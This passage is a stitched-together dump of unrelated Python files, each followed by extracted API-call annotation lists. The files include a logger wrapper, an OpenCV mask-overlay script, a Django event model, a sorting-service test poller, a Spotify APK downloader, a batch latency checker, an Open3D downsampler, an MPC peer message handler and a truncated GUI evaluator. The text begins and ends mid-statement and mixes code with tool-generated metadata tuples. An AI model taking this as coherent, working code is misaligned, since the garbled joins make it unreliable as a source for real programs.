seconds to retry..."""'], {}), "(f'wait for {retry_interval} seconds to retry...')\n", (3197, 3247), False, 'from joint_teapot.utils.logger import logger\n'), ((3268, 3289), 'time.sleep', 'sleep', (['retry_interval'], {}), '(retry_interval)\n', (3273, 3289), False, 'from time import sleep\n'), ((1894, 1948), 'joint_teapot.utils.logger.logger.error', 'logger.error', (['f"""{repo_name} origin/{branch} not found"""'], {}), "(f'{repo_name} origin/{branch} not found')\n", (1906, 1948), False, 'from joint_teapot.utils.logger import logger\n'), ((3523, 3575), 'joint_teapot.utils.logger.logger.error', 'logger.error', (['f"""{repo_name} origin/master not found"""'], {}), "(f'{repo_name} origin/master not found')\n", (3535, 3575), False, 'from joint_teapot.utils.logger import logger\n')] |
from .watch_time import time_str
import fitlog
class Logger:
def __init__(self , fil_path = None):
self.log_fil = open(fil_path , "w" , encoding = "utf-8")
def nolog(self , cont = ""):
pass
def log_print(self , cont = ""):
self.log_fil.write(cont + "\n")
self.log_fil.flush()
print (cont)
fitlog.add_to_line(cont)
def log_print_w_time(self , cont = ""):
self.log_print(str(cont) + " | " + time_str())
| [
"fitlog.add_to_line"
] | [((308, 332), 'fitlog.add_to_line', 'fitlog.add_to_line', (['cont'], {}), '(cont)\n', (326, 332), False, 'import fitlog\n')] |
import cv2
import numpy as np
import os
under_layer_path = '/home/ubuntu/share/cam_lidar/Tu_indoor/red2'
upper_layer_path = "/home/ubuntu/share/cam_lidar/Tu_indoor/aisle02_dir"
target_files = os.listdir(upper_layer_path)
target_imgs = [f for f in target_files if os.path.isfile(os.path.join(upper_layer_path, f))]
try:
target_imgs.remove(".DS_Store")
except ValueError:
pass
lower = np.array([0, 0, 128])
upper = np.array([0, 0, 128])
target_colors = np.array([
[0, 0, 0],
[192, 0, 0],
[128, 64, 128],
[0, 0, 128],
[0, 64, 64],
[128, 128, 192],
[128, 0, 64],
[128, 128, 128],
])
for img_name in target_imgs:
base_img = cv2.imread(os.path.join(under_layer_path, img_name), cv2.IMREAD_COLOR)
result_img = np.zeros(base_img.shape, dtype=base_img.dtype)
img_mask = cv2.inRange(base_img, lower, upper)
img_mask_color = cv2.bitwise_and(base_img, base_img, mask=img_mask)
result_img = cv2.add(result_img, img_mask_color)
cv2.imwrite("result.png", result_img)
target_img = cv2.imread(os.path.join(upper_layer_path, img_name), cv2.IMREAD_COLOR)
for color in target_colors:
img_mask = cv2.inRange(target_img, color, color)
img_mask_inv = cv2.bitwise_not(img_mask)
img_mask_color = cv2.bitwise_and(target_img, target_img, mask=img_mask)
result_img = cv2.bitwise_and(result_img, result_img, mask=img_mask_inv)
result_img = cv2.add(result_img, img_mask_color)
print(os.path.join(upper_layer_path, img_name[:-3]) + "png")
cv2.imwrite(os.path.join(upper_layer_path, img_name[:-3] + "png"), result_img)
| [
"cv2.imwrite",
"os.listdir",
"cv2.inRange",
"cv2.bitwise_and",
"os.path.join",
"numpy.array",
"numpy.zeros",
"cv2.bitwise_not",
"cv2.add"
] | [((193, 221), 'os.listdir', 'os.listdir', (['upper_layer_path'], {}), '(upper_layer_path)\n', (203, 221), False, 'import os\n'), ((393, 414), 'numpy.array', 'np.array', (['[0, 0, 128]'], {}), '([0, 0, 128])\n', (401, 414), True, 'import numpy as np\n'), ((423, 444), 'numpy.array', 'np.array', (['[0, 0, 128]'], {}), '([0, 0, 128])\n', (431, 444), True, 'import numpy as np\n'), ((461, 589), 'numpy.array', 'np.array', (['[[0, 0, 0], [192, 0, 0], [128, 64, 128], [0, 0, 128], [0, 64, 64], [128, \n 128, 192], [128, 0, 64], [128, 128, 128]]'], {}), '([[0, 0, 0], [192, 0, 0], [128, 64, 128], [0, 0, 128], [0, 64, 64],\n [128, 128, 192], [128, 0, 64], [128, 128, 128]])\n', (469, 589), True, 'import numpy as np\n'), ((938, 984), 'numpy.zeros', 'np.zeros', (['base_img.shape'], {'dtype': 'base_img.dtype'}), '(base_img.shape, dtype=base_img.dtype)\n', (946, 984), True, 'import numpy as np\n'), ((1001, 1036), 'cv2.inRange', 'cv2.inRange', (['base_img', 'lower', 'upper'], {}), '(base_img, lower, upper)\n', (1012, 1036), False, 'import cv2\n'), ((1058, 1108), 'cv2.bitwise_and', 'cv2.bitwise_and', (['base_img', 'base_img'], {'mask': 'img_mask'}), '(base_img, base_img, mask=img_mask)\n', (1073, 1108), False, 'import cv2\n'), ((1126, 1161), 'cv2.add', 'cv2.add', (['result_img', 'img_mask_color'], {}), '(result_img, img_mask_color)\n', (1133, 1161), False, 'import cv2\n'), ((1166, 1203), 'cv2.imwrite', 'cv2.imwrite', (['"""result.png"""', 'result_img'], {}), "('result.png', result_img)\n", (1177, 1203), False, 'import cv2\n'), ((861, 901), 'os.path.join', 'os.path.join', (['under_layer_path', 'img_name'], {}), '(under_layer_path, img_name)\n', (873, 901), False, 'import os\n'), ((1233, 1273), 'os.path.join', 'os.path.join', (['upper_layer_path', 'img_name'], {}), '(upper_layer_path, img_name)\n', (1245, 1273), False, 'import os\n'), ((1344, 1381), 'cv2.inRange', 'cv2.inRange', (['target_img', 'color', 'color'], {}), '(target_img, color, color)\n', (1355, 1381), False, 'import cv2\n'), ((1405, 1430), 'cv2.bitwise_not', 'cv2.bitwise_not', (['img_mask'], {}), '(img_mask)\n', (1420, 1430), False, 'import cv2\n'), ((1456, 1510), 'cv2.bitwise_and', 'cv2.bitwise_and', (['target_img', 'target_img'], {'mask': 'img_mask'}), '(target_img, target_img, mask=img_mask)\n', (1471, 1510), False, 'import cv2\n'), ((1532, 1590), 'cv2.bitwise_and', 'cv2.bitwise_and', (['result_img', 'result_img'], {'mask': 'img_mask_inv'}), '(result_img, result_img, mask=img_mask_inv)\n', (1547, 1590), False, 'import cv2\n'), ((1612, 1647), 'cv2.add', 'cv2.add', (['result_img', 'img_mask_color'], {}), '(result_img, img_mask_color)\n', (1619, 1647), False, 'import cv2\n'), ((1731, 1784), 'os.path.join', 'os.path.join', (['upper_layer_path', "(img_name[:-3] + 'png')"], {}), "(upper_layer_path, img_name[:-3] + 'png')\n", (1743, 1784), False, 'import os\n'), ((279, 312), 'os.path.join', 'os.path.join', (['upper_layer_path', 'f'], {}), '(upper_layer_path, f)\n', (291, 312), False, 'import os\n'), ((1659, 1704), 'os.path.join', 'os.path.join', (['upper_layer_path', 'img_name[:-3]'], {}), '(upper_layer_path, img_name[:-3])\n', (1671, 1704), False, 'import os\n')] |
''' Events Model '''
import uuid
from django.db import models
# Utils Model
from eventup.utils.models import GeneralModel
class Event(GeneralModel):
''' Event Model '''
# Id
id = models.UUIDField(primary_key=True, default=uuid.uuid4, editable=False)
# Event data
name = models.CharField(max_length=100, unique=True)
date = models.DateTimeField(null=True, blank=True)
description = models.CharField(max_length=500)
url = models.URLField()
banner_img = models.ImageField(
'banner picture',
upload_to='banner/pictures/',
blank=True,
null=True
)
banner_title = models.CharField(max_length=300, blank=True)
# Event Relations
template = models.ForeignKey(
to="event_templates.Template",
on_delete=models.SET_NULL,
null=True,
)
sponsor = models.ManyToManyField(
to="Sponsor",
)
schedule = models.ManyToManyField(
to="Schedule",
)
def __str__(self):
return str(self.name)
| [
"django.db.models.ForeignKey",
"django.db.models.ManyToManyField",
"django.db.models.ImageField",
"django.db.models.CharField",
"django.db.models.DateTimeField",
"django.db.models.URLField",
"django.db.models.UUIDField"
] | [((195, 265), 'django.db.models.UUIDField', 'models.UUIDField', ([], {'primary_key': '(True)', 'default': 'uuid.uuid4', 'editable': '(False)'}), '(primary_key=True, default=uuid.uuid4, editable=False)\n', (211, 265), False, 'from django.db import models\n'), ((295, 340), 'django.db.models.CharField', 'models.CharField', ([], {'max_length': '(100)', 'unique': '(True)'}), '(max_length=100, unique=True)\n', (311, 340), False, 'from django.db import models\n'), ((352, 395), 'django.db.models.DateTimeField', 'models.DateTimeField', ([], {'null': '(True)', 'blank': '(True)'}), '(null=True, blank=True)\n', (372, 395), False, 'from django.db import models\n'), ((414, 446), 'django.db.models.CharField', 'models.CharField', ([], {'max_length': '(500)'}), '(max_length=500)\n', (430, 446), False, 'from django.db import models\n'), ((457, 474), 'django.db.models.URLField', 'models.URLField', ([], {}), '()\n', (472, 474), False, 'from django.db import models\n'), ((492, 585), 'django.db.models.ImageField', 'models.ImageField', (['"""banner picture"""'], {'upload_to': '"""banner/pictures/"""', 'blank': '(True)', 'null': '(True)'}), "('banner picture', upload_to='banner/pictures/', blank=\n True, null=True)\n", (509, 585), False, 'from django.db import models\n'), ((638, 682), 'django.db.models.CharField', 'models.CharField', ([], {'max_length': '(300)', 'blank': '(True)'}), '(max_length=300, blank=True)\n', (654, 682), False, 'from django.db import models\n'), ((721, 811), 'django.db.models.ForeignKey', 'models.ForeignKey', ([], {'to': '"""event_templates.Template"""', 'on_delete': 'models.SET_NULL', 'null': '(True)'}), "(to='event_templates.Template', on_delete=models.SET_NULL,\n null=True)\n", (738, 811), False, 'from django.db import models\n'), ((853, 889), 'django.db.models.ManyToManyField', 'models.ManyToManyField', ([], {'to': '"""Sponsor"""'}), "(to='Sponsor')\n", (875, 889), False, 'from django.db import models\n'), ((921, 958), 'django.db.models.ManyToManyField', 'models.ManyToManyField', ([], {'to': '"""Schedule"""'}), "(to='Schedule')\n", (943, 958), False, 'from django.db import models\n')] |
#! /usr/bin/env python
import django
from django.conf import settings
django.setup()
from geocamTiePoint.models import Overlay
def moveCenterPtOutOfExtras():
overlays = Overlay.objects.all()
for overlay in overlays:
overlay.centerLat = overlay.extras.centerLat
overlay.centerLon = overlay.extras.centerLon
overlay.nadirLat = overlay.extras.nadirLat
overlay.nadirLon = overlay.extras.nadirLon
overlay.save()
moveCenterPtOutOfExtras() | [
"django.setup",
"geocamTiePoint.models.Overlay.objects.all"
] | [((70, 84), 'django.setup', 'django.setup', ([], {}), '()\n', (82, 84), False, 'import django\n'), ((176, 197), 'geocamTiePoint.models.Overlay.objects.all', 'Overlay.objects.all', ([], {}), '()\n', (195, 197), False, 'from geocamTiePoint.models import Overlay\n')] |
#coding:utf-8
import threading
class Singleton(object):
def __new__(cls, *args, **kwargs):
lock = threading.Lock()
lock.acquire()
if not hasattr(cls, "_instance"):
cls._instance = object.__new__(cls)
cls._instance.__Singleton_Init__(*args, **kwargs)
lock.release()
return cls._instance
def __Singleton_Init__(self):
raise RuntimeError("__Singleton_Init__ must be overwritten") | [
"threading.Lock"
] | [((111, 127), 'threading.Lock', 'threading.Lock', ([], {}), '()\n', (125, 127), False, 'import threading\n')] |
from generator.actions import Actions
import random
import string
import struct
import numpy as np
import math
import datetime as dt
import ctypes
def kaprica_mixin(self):
if hasattr(self, 'xlat_seed'):
return
def xlat_seed(seed):
def hash_string(seed):
H = 0x314abc86
for c in seed:
H = (H * 37) & 0xffffffff
H ^= ord(c)
H = ((H << 13) ^ (H >> 19)) & 0xffffffff
return H
def hash_iterate(H):
H = (H * 3) & 0xffffffff
H = ((H << 13) ^ (H >> 19) ^ (H >> 21)) & 0xffffffff
return H
xmap = list(xrange(256))
xmap_inv = list(xrange(256))
state = hash_string(seed)
for i in xrange(255, 0, -1):
j = state % i
state = hash_iterate(state)
xmap[i], xmap[j] = xmap[j], xmap[i]
for i in xrange(256):
xmap_inv[xmap[i]] = i
self.xlat_map = xmap
self.xlat_map_inv = xmap_inv
self.xlat_seed = xlat_seed
self.xlat_map = None
self.xlat_map_inv = None
def xlat_string(s, inverse=False):
if inverse:
return ''.join([chr(self.xlat_map_inv[ord(c)]) for c in s])
return ''.join([chr(self.xlat_map[ord(c)]) for c in s])
self.xlat_string = xlat_string
def read(delim=None, length=None, expect=None):
if self.xlat_map:
if delim:
delim = self.xlat_string(delim)
if expect:
expect = self.xlat_string(expect)
return self._original_read(delim=delim, length=length, expect=expect)
self._original_read = self.read
self.read = read
def write(s):
if self.xlat_map:
if s:
s = self.xlat_string(s)
return self._original_write(s)
self._original_write = self.write
self.write = write
def random_word(max_size=10, min_size=2):
if random.randint(0,4):
characters = string.letters + string.digits
else:
characters = string.letters
max_size = max_size if max_size >= min_size else min_size
max_size = random.randint(min_size, max_size)
return ("".join(random.choice(characters) for c in range(max_size))).lower()
def random_text(max_words=10, min_words=3):
max_words = max_words if max_words >= min_words else min_words
text = ''
for x in xrange(random.randint(min_words, max_words)):
text += random_word() + ' '
return text
class Cs10Fun(Actions):
def _read(self, data):
self.read(length=len(data), expect=data)
def _read_array(self, array=None):
if not array:
array = self._cur_array
if not len(array):
self._read("Empty Array\n")
else:
self._read("Array data\n")
temp_list = []
for val in array:
temp_list.append("%d, " % val)
temp_list[-1] = temp_list[-1][:-2]
self._read("[" + ''.join(temp_list) + ']\n')
def start(self):
#self.delay(100)
kaprica_mixin(self)
self.xlat_seed('2e0715f1709c')
self.write(self.magic_page[:4])
self.read(length=0x1000, expect=self.magic_page)
self._cur_array = []
self._read("Welcome to CS10Fun!\n")
self._read("Today's lesson is on sorting! We're going to cover 4 types of sorts.\n")
self._read("Before we begin, create an array of ints\n")
self.menu()
self.enter_array()
def menu(self):
self._read("Main Menu\n")
self._read("1. Enter Array\n")
self._read("2. Multiply Array\n")
self._read("3. Try Insertion Sort\n")
self._read("4. Try Selection Sort\n")
self._read("5. Try Heap Sort\n")
self._read("6. Try Merge Sort\n")
self._read("7. Reprint Array\n")
self._read("0. Exit\n")
self._read(" -----\n")
self._read("Current Number of items in array = %d\n" % len(self._cur_array))
#self._read_array()
self._read(" -----\n")
self._read("Make a selection\n")
def enter_array(self):
self.write('1\n')
self._read("Enter a list of numbers to sort. End the list with ';;'\n")
self._cur_array = []
for x in xrange(random.randint(1,100)):
self._cur_array.append(random.randint(-1000000000, 1000000000))
self.write(','.join([str(x) for x in self._cur_array]) + ',;;\n')
self._read("New Array\n")
self._read("Number of items in array = %d\n" % len(self._cur_array))
self._read_array()
def multiply_array(self):
self.write('2\n')
if len(self._cur_array) > 10000:
self._read("Array is too long. Can't multiply any more\n")
elif len(self._cur_array):
self._read("Quick Grow! Enter a list multiplier. End number with ';'\n")
multiplier = random.randint(1,3)
while multiplier * len(self._cur_array) > 1024 and multiplier * len(self._cur_array) <= 1048:
multiplier = random.randint(1,3)
self.write("%d;\n" % multiplier)
self._cur_array *= multiplier
self._read("Multiplied Array\n")
self._read("Number of items in array = %d\n" % len(self._cur_array))
self._read_array()
def insert_sort(self):
self.write('3\n')
self._read_array(sorted(self._cur_array))
#self.read(expect='Insertion sort takes [\d]+ operations\n', expect_format='pcre', delim='\n')
self.read(delim='\n')
def selection_sort(self):
self.write('4\n')
self._read_array(sorted(self._cur_array))
#self.read(expect='Selection sort takes [\d]+ operations\n', expect_format='pcre', delim='\n')
self.read(delim='\n')
def heap_sort(self):
self.write('5\n')
self._read_array(sorted(self._cur_array))
#self.read(expect='Heap sort takes [\d]+ operations\n', expect_format='pcre', delim='\n')
self.read(delim='\n')
def merge_sort(self):
self.write('6\n')
self._read_array(sorted(self._cur_array))
#self.read(expect='Merge sort takes [\d]+ operations\n', expect_format='pcre', delim='\n')
self.read(delim='\n')
def reprint_array(self):
self.write('7\n')
self._read("Current Array\n")
self._read("Number of items in array = %d\n" % len(self._cur_array))
self._read_array()
def exit(self):
self.write('0\n')
self._read("Thanks for joining us\n")
self._read("See you next time\n")
| [
"random.choice",
"random.randint"
] | [((1945, 1965), 'random.randint', 'random.randint', (['(0)', '(4)'], {}), '(0, 4)\n', (1959, 1965), False, 'import random\n'), ((2141, 2175), 'random.randint', 'random.randint', (['min_size', 'max_size'], {}), '(min_size, max_size)\n', (2155, 2175), False, 'import random\n'), ((2403, 2439), 'random.randint', 'random.randint', (['min_words', 'max_words'], {}), '(min_words, max_words)\n', (2417, 2439), False, 'import random\n'), ((4305, 4327), 'random.randint', 'random.randint', (['(1)', '(100)'], {}), '(1, 100)\n', (4319, 4327), False, 'import random\n'), ((4364, 4403), 'random.randint', 'random.randint', (['(-1000000000)', '(1000000000)'], {}), '(-1000000000, 1000000000)\n', (4378, 4403), False, 'import random\n'), ((4932, 4952), 'random.randint', 'random.randint', (['(1)', '(3)'], {}), '(1, 3)\n', (4946, 4952), False, 'import random\n'), ((2196, 2221), 'random.choice', 'random.choice', (['characters'], {}), '(characters)\n', (2209, 2221), False, 'import random\n'), ((5087, 5107), 'random.randint', 'random.randint', (['(1)', '(3)'], {}), '(1, 3)\n', (5101, 5107), False, 'import random\n')] |
# Kano or Terminator
# By <NAME>
# I will not be held responsible for:
# any shenanigans
import os
# ಠ_ಠ
# ¯¯\_(ツ)_/¯¯
# (╭ರ_•́)
os.system("printf '\e[0;35;1;1m (╭ರ_'")
os.system("printf '\e[0;31;1;5m°'")
os.system("printf '\e[0;35;1;1m)\n'")
| [
"os.system"
] | [((130, 177), 'os.system', 'os.system', (['"""printf \'\\\\e[0;35;1;1m (╭ರ_\'"""'], {}), '("printf \'\\\\e[0;35;1;1m (╭ರ_\'")\n', (139, 177), False, 'import os\n'), ((177, 213), 'os.system', 'os.system', (['"""printf \'\\\\e[0;31;1;5m°\'"""'], {}), '("printf \'\\\\e[0;31;1;5m°\'")\n', (186, 213), False, 'import os\n'), ((213, 254), 'os.system', 'os.system', (['"""printf \'\\\\e[0;35;1;1m)\n\'"""'], {}), '("""printf \'\\\\e[0;35;1;1m)\n\'""")\n', (222, 254), False, 'import os\n')] |
import os
import re
import urllib.request
import click
import requests
from tqdm import tqdm
URL_UPTODOWN = 'https://spotify.de.uptodown.com/android/download'
URL_GHAPI = 'https://api.github.com/repos/Theta-Dev/Spotify-Gender-Ex/commits/master'
URL_RTABLE = 'https://raw.githubusercontent.com/Theta-Dev/Spotify-Gender-Ex/%s/spotify_gender_ex/res/replacements.json'
class Downloader:
def __init__(self, download_id=''):
pattern_url = re.escape('https://dw.uptodown.com/dwn/') + r'(\w|\.|\/|-|\+|=)+'
pattern_version = r'(?<=<div class=version>)(\d|\.)+'
if download_id:
url = URL_UPTODOWN + '/' + download_id
else:
url = URL_UPTODOWN
try:
r = requests.get(url)
except Exception:
msg = 'Spotify-Version konnte nicht abgerufen werden'
click.echo(msg)
self.spotify_version = 'NA'
self.spotify_url = ''
return
search_url = re.search(pattern_url, r.text)
search_version = re.search(pattern_version, r.text)
if not search_url or not search_version:
msg = 'Spotify-Version nicht gefunden'
click.echo(msg)
self.spotify_version = 'NA'
self.spotify_url = ''
return
self.spotify_url = str(search_url[0])
self.spotify_version = str(search_version[0])
def download_spotify(self, output_path):
if not self.spotify_url:
return False
return _download(self.spotify_url, output_path, 'Spotify')
@staticmethod
def get_replacement_table_raw():
try:
# Get latest commit
sha = requests.get(URL_GHAPI).json()['sha']
return requests.get(URL_RTABLE % sha).text
except Exception:
click.echo('Ersetzungstabelle konnte nicht abgerufen werden. Verwende eingebaute Tabelle.')
# See here
# https://stackoverflow.com/questions/15644964/python-progress-bar-and-downloads
class _DownloadProgressBar(tqdm):
def update_to(self, b=1, bsize=1, tsize=None):
if tsize is not None:
self.total = tsize
self.update(b * bsize - self.n)
def _download(url, output_path, description=''):
if description:
click.echo('Lade %s herunter: %s' % (description, url))
else:
click.echo('Herunterladen: ' + url)
try:
with _DownloadProgressBar(unit='B', unit_scale=True, miniters=1, desc=url.split('/')[-1]) as t:
urllib.request.urlretrieve(url, filename=output_path, reporthook=t.update_to)
except Exception:
return False
return os.path.isfile(output_path)
| [
"re.escape",
"requests.get",
"os.path.isfile",
"click.echo",
"re.search"
] | [((2637, 2664), 'os.path.isfile', 'os.path.isfile', (['output_path'], {}), '(output_path)\n', (2651, 2664), False, 'import os\n'), ((981, 1011), 're.search', 're.search', (['pattern_url', 'r.text'], {}), '(pattern_url, r.text)\n', (990, 1011), False, 'import re\n'), ((1037, 1071), 're.search', 're.search', (['pattern_version', 'r.text'], {}), '(pattern_version, r.text)\n', (1046, 1071), False, 'import re\n'), ((2269, 2324), 'click.echo', 'click.echo', (["('Lade %s herunter: %s' % (description, url))"], {}), "('Lade %s herunter: %s' % (description, url))\n", (2279, 2324), False, 'import click\n'), ((2343, 2378), 'click.echo', 'click.echo', (["('Herunterladen: ' + url)"], {}), "('Herunterladen: ' + url)\n", (2353, 2378), False, 'import click\n'), ((449, 490), 're.escape', 're.escape', (['"""https://dw.uptodown.com/dwn/"""'], {}), "('https://dw.uptodown.com/dwn/')\n", (458, 490), False, 'import re\n'), ((728, 745), 'requests.get', 'requests.get', (['url'], {}), '(url)\n', (740, 745), False, 'import requests\n'), ((1185, 1200), 'click.echo', 'click.echo', (['msg'], {}), '(msg)\n', (1195, 1200), False, 'import click\n'), ((850, 865), 'click.echo', 'click.echo', (['msg'], {}), '(msg)\n', (860, 865), False, 'import click\n'), ((1743, 1773), 'requests.get', 'requests.get', (['(URL_RTABLE % sha)'], {}), '(URL_RTABLE % sha)\n', (1755, 1773), False, 'import requests\n'), ((1817, 1918), 'click.echo', 'click.echo', (['"""Ersetzungstabelle konnte nicht abgerufen werden. Verwende eingebaute Tabelle."""'], {}), "(\n 'Ersetzungstabelle konnte nicht abgerufen werden. Verwende eingebaute Tabelle.'\n )\n", (1827, 1918), False, 'import click\n'), ((1686, 1709), 'requests.get', 'requests.get', (['URL_GHAPI'], {}), '(URL_GHAPI)\n', (1698, 1709), False, 'import requests\n')] |
# Intraday latency check function
from datetime import datetime
import pytz
from datacoco_batch.batch import Batch
from datacoco_core.logger import Logger
log = Logger()
def convert_time(t):
# convert naive datetime object to utc aware datetime
utc = pytz.utc
timetz = utc.localize(t)
return timetz
class CheckWF:
"""
Calls batchy endpoint to get job status.
"""
def __init__(self, wf, batchy_server, batchy_port):
self.b = Batch(wf, batchy_server, batchy_port)
log.l("Checking wf: {}".format(wf))
def check_batchy_wf(self, max_latency):
status = self.b.get_status().get("global")
if status:
failure_count, result = self.calc_latency_tests(
status, max_latency
)
else:
raise ValueError("Could not find wf")
return failure_count, result
@staticmethod
def calc_latency_tests(result, max_latency):
"""
run business logic on result to create alerts
:param result:
:param max_latency:
:return:
"""
failure_count = 0
# use batch start, not end
batch_start = result.get("batch_start")
latency = (
datetime.now(pytz.utc)
- convert_time(
datetime.strptime(batch_start, "%Y-%m-%dT%H:%M:%S.%f")
)
).seconds / 60
if latency >= max_latency:
log.l(
"latency: {} is greater than max latency: {}".format(
latency, max_latency
)
)
failure_count = 1
result["alert_level"] = "FAILURE"
result["alert_message"] = "latency issue"
elif result["status"] == "failure":
log.l("failure b/c of job failure")
result["alert_level"] = "FAILURE"
result["alert_message"] = "job failure"
elif latency >= max_latency * 0.8:
log.l(
"latency: {} is greater than 80% of max latency: {}".format(
latency, max_latency
)
)
result["alert_level"] = "WARNING"
result["alert_message"] = "passed 80% of latency threshold"
else:
result["alert_level"] = "SUCCESS"
log.l("Success")
result["latency"] = latency
return failure_count, result
| [
"datetime.datetime.strptime",
"datacoco_batch.batch.Batch",
"datacoco_core.logger.Logger",
"datetime.datetime.now"
] | [((164, 172), 'datacoco_core.logger.Logger', 'Logger', ([], {}), '()\n', (170, 172), False, 'from datacoco_core.logger import Logger\n'), ((473, 510), 'datacoco_batch.batch.Batch', 'Batch', (['wf', 'batchy_server', 'batchy_port'], {}), '(wf, batchy_server, batchy_port)\n', (478, 510), False, 'from datacoco_batch.batch import Batch\n'), ((1239, 1261), 'datetime.datetime.now', 'datetime.now', (['pytz.utc'], {}), '(pytz.utc)\n', (1251, 1261), False, 'from datetime import datetime\n'), ((1306, 1360), 'datetime.datetime.strptime', 'datetime.strptime', (['batch_start', '"""%Y-%m-%dT%H:%M:%S.%f"""'], {}), "(batch_start, '%Y-%m-%dT%H:%M:%S.%f')\n", (1323, 1360), False, 'from datetime import datetime\n')] |
#!/usr/bin/env python
# -*- coding: utf-8 -*-
import open3d as o3d
def downSample(pointcloud_file_path, down_sample_cluster_num, save_pointcloud_file_path):
print("[INFO][downSample]")
print("\t start down sampling pointcloud :")
print("\t down_sample_cluster_num = " + str(down_sample_cluster_num) + "...")
pointcloud = o3d.io.read_point_cloud(pointcloud_file_path, print_progress=True)
down_sampled_pointcloud = o3d.geometry.PointCloud.uniform_down_sample(
pointcloud, down_sample_cluster_num)
o3d.io.write_point_cloud(
save_pointcloud_file_path,
down_sampled_pointcloud,
write_ascii=True,
print_progress=True)
print("SUCCESS!")
return True
| [
"open3d.io.write_point_cloud",
"open3d.geometry.PointCloud.uniform_down_sample",
"open3d.io.read_point_cloud"
] | [((339, 405), 'open3d.io.read_point_cloud', 'o3d.io.read_point_cloud', (['pointcloud_file_path'], {'print_progress': '(True)'}), '(pointcloud_file_path, print_progress=True)\n', (362, 405), True, 'import open3d as o3d\n'), ((437, 522), 'open3d.geometry.PointCloud.uniform_down_sample', 'o3d.geometry.PointCloud.uniform_down_sample', (['pointcloud', 'down_sample_cluster_num'], {}), '(pointcloud, down_sample_cluster_num\n )\n', (480, 522), True, 'import open3d as o3d\n'), ((532, 651), 'open3d.io.write_point_cloud', 'o3d.io.write_point_cloud', (['save_pointcloud_file_path', 'down_sampled_pointcloud'], {'write_ascii': '(True)', 'print_progress': '(True)'}), '(save_pointcloud_file_path, down_sampled_pointcloud,\n write_ascii=True, print_progress=True)\n', (556, 651), True, 'import open3d as o3d\n')] |
import asyncio
import pickle
from congregation.net.messages import *
class Handler:
def __init__(self, peer, server: [asyncio.Protocol, None] = None):
self.peer = peer
self.server = server
self.msg_handlers = self._define_msg_map()
def handle_msg(self, data):
"""
determine message type and handle accordingly
"""
if isinstance(data, Msg):
m = data
else:
m = pickle.loads(data)
if m.pid not in self.peer.peer_connections:
raise Exception(f"Msg of type {m.msg_type} received from unrecognized peer: {m.pid}")
self.msg_handlers[m.msg_type](m)
def _define_msg_map(self):
return {
"IAM": self.handle_iam_msg,
"READY": self.handle_ready_msg,
"CONFIG": self.handle_config_msg,
"ACK": self.handle_ack_msg,
"REQUEST": self.handle_request_msg
}
def _check_dispatcher(self, m: [ReadyMsg, ConfigMsg, AckMsg, RequestMsg]):
if self.peer.dispatcher is not None:
if self.peer.dispatcher.dispatch_type == m.job_type:
return True
self.peer.msg_buffer.append(m)
return False
def handle_iam_msg(self, m: IAMMsg):
"""
we need to be able to resolve which party a given connection
is for, which is why a done callback is added to the connection
future which sends an IAMMsg with the pid of the connecting party.
this function sets that connection value in peer.peer_connections
accordingly when an IAMMsg is received.
"""
print(f"IAMMsg received from {m.pid}")
conn = self.peer.peer_connections[m.pid]
if isinstance(conn, asyncio.Future):
if not conn.done():
conn.set_result((self.server.transport, self))
def handle_ready_msg(self, m: ReadyMsg):
if self._check_dispatcher(m):
print(f"ReadyMsg received from party {m.pid} for {m.job_type} job.")
rdy = self.peer.dispatcher.parties_ready[m.pid]
if isinstance(rdy, asyncio.Future):
if not rdy.done():
rdy.set_result(True)
def handle_config_msg(self, m: ConfigMsg):
if self._check_dispatcher(m):
print(f"ConfigMsg received from party {m.pid} for {m.job_type} job.")
cfg = self.peer.dispatcher.parties_config[m.pid]["CFG"]
if isinstance(cfg, asyncio.Future):
if not cfg.done():
cfg.set_result(m.config)
print(f"Sending AckMsg to party {m.pid} for receipt of ConfigMsg for {m.job_type} job.")
self.peer.send_ack(
m.pid,
"CONFIG",
m.job_type
)
def handle_ack_msg(self, m: AckMsg):
if self._check_dispatcher(m):
print(f"AckMsg of type {m.ack_type} received from party {m.pid} for {m.job_type} job.")
if m.ack_type == "CONFIG":
a = self.peer.dispatcher.parties_config[m.pid]["ACK"]
if isinstance(a, asyncio.Future):
if not a.done():
a.set_result(True)
def handle_request_msg(self, m: RequestMsg):
if self._check_dispatcher(m):
print(f"Request message for {m.request_type} received from party {m.pid} for {m.job_type} job.")
if m.request_type == "CONFIG":
self.peer.send_cfg(m.pid, self.peer.dispatcher.config_to_exchange, m.job_type)
| [
"pickle.loads"
] | [((459, 477), 'pickle.loads', 'pickle.loads', (['data'], {}), '(data)\n', (471, 477), False, 'import pickle\n')] |
#!/usr/bin/env python
# -*- coding: utf-8 -*-
"""
Evaluators.
"""
# ----------------------------------------------------------------------------
# Imports
# ----------------------------------------------------------------------------
# Standard library modules
import importlib
import time
from datetime import date
from pathlib import Path
from typing import Any, Dict, List, Optional
# Third-party modules
import matplotlib.pyplot as plt
import matplotlib.ticker as ticker
import pandas as pd
import seaborn as sns
from loguru import logger
# First-party modules
from aim.core import image_utils
# ----------------------------------------------------------------------------
# Metadata
# ----------------------------------------------------------------------------
__author__ = "<NAME>"
__date__ = "2021-02-09"
__email__ = "<EMAIL>"
__version__ = "1.0"
# ----------------------------------------------------------------------------
# Evaluators
# ----------------------------------------------------------------------------
class GUIDesignsEvaluator:
# Private constants
_METRICS: List[str] = [
"m1_png_file_size", # PNG file size
"m2_jpeg_file_size", # JPEG file size
"m3_distinct_rgb_values", # Distinct RGB values
"m4_contour_density", # Contour density
"m5_figure_ground_contrast", # Figure-ground contrast
"m6_contour_congestion", # Contour congestion
]
_METRIC_RESULTS = {
"m1_result_1": {"name": "PNG file size in bytes"},
"m2_result_1": {"name": "JPEG file size in bytes"},
"m3_result_1": {"name": "Number of distinct RGB values"},
"m4_result_1": {"name": "Contour density"},
"m5_result_1": {"name": "Figure-ground contrast"},
"m6_result_1": {"name": "Contour congestion"},
}
# Public constants
NAME: str = "GUI Designs Evaluator"
VERSION: str = "1.0"
# Initializer
def __init__(self, input_dir: str, output_dir: str, plot_results: bool):
self.input_dir: Path = Path(input_dir)
self.input_csv_file: Optional[Path] = None
self.input_gui_design_files: List[Path] = []
self.results: Optional[List[Dict[str, Any]]] = None
self.output_dir: Path = Path(output_dir) / self.input_dir.name
self.output_csv_file: Path = self.output_dir / "{}.csv".format(
self.output_dir.name
)
self.plot_results: bool = plot_results
# Private methods
def _set_input_csv_file(self):
for csv_file_path in list(self.input_dir.glob("*.csv"))[:1]:
self.input_csv_file = csv_file_path
def _set_input_gui_design_files(self):
# Get input CSV file
if self.input_csv_file:
# Read input data
